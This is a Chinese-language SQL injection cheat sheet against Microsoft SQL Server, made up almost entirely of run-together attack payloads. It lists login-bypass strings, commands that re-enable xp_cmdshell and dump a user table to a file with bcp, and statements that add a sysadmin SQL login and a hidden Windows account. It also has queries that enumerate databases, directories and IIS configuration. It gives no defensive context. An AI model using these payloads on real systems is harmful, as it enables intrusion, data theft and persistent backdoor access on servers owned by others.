sql注入

--注入测试语句(登录)--' and 0<(select COUNT(*) from BJ_User) or '1'='1' or '1'='1--导出表内容EXEC master..xp_cmdshell 'bcp BJ_CARCESHI.dbo.bj_user out c:\Temp.xls -c -q -S"." -U"sa" -P"1"'--连接的用户SELECT System_user--开启cmdshellSELECT * FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell'EXEC master.dbo.sp_addextendedproc xp_cmdshell,'xplog70.dll'EXEC master.dbo.sp_addextendedproc xp_cmdshell,'c:\inetpub\wwwroot\xplog70.dll'--开启xp_cmdshell部分---------------------------------------------------- To allow advanced options to be changed.EXEC sp_configure 'show advanced options', 1GO-- To update the currently configured value for advanced options.RECONFIGUREGO-- To enable the feature.EXEC sp_configure 'xp_cmdshell', 1GO-- To update the currently configured value for this feature.RECONFIGUREGO--通过xp_cmdshell执行shell命令的部分--------------------------------------------------Exec xp_cmdshell 'bcp 'GO--关闭xp_cmdshell部分------------------------------------------------------- To allow advanced options to be changed.EXEC sp_configure 'show advanced options', 1GO-- To update the currently configured value for advanced options.RECONFIGUREGO-- To enable the feature.EXEC sp_configure 'xp_cmdshell', 0GO-- To update the currently configured value for this feature.RECONFIGUREGO--添加sql用户exec master.dbo.sp_addlogin china,123exec sp_addsrvrolemember 'china','sysadmin'--添加系统用户use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c net user jiaoniang$ 1866574 /add"; --得到数据库名（从1到5都是系统的id，6以上才可以判断）select name from master.dbo.sysdatabases where dbid>5 　　create table dirs1(paths varchar(1000),p varchar(1000))insert dirs1 exec master.dbo.xp_dirtree 'c:\' delete from dirs1insert dirs1 exec master.dbo.xp_cmdshell 'dir c:\ /B/D' select top 1 paths from dirs1"select * from user1 where username='"+"' or '1'='1'";"+" and userpwd='' and 0=(select top 1 paths from dirs1)"' or '1'='1';EXEC master.dbo.sp_addextendedproc xp_cmdshell,'xplog70.dll';select 'exec master..xp_cmdshell 'cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root>a.txt'CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500))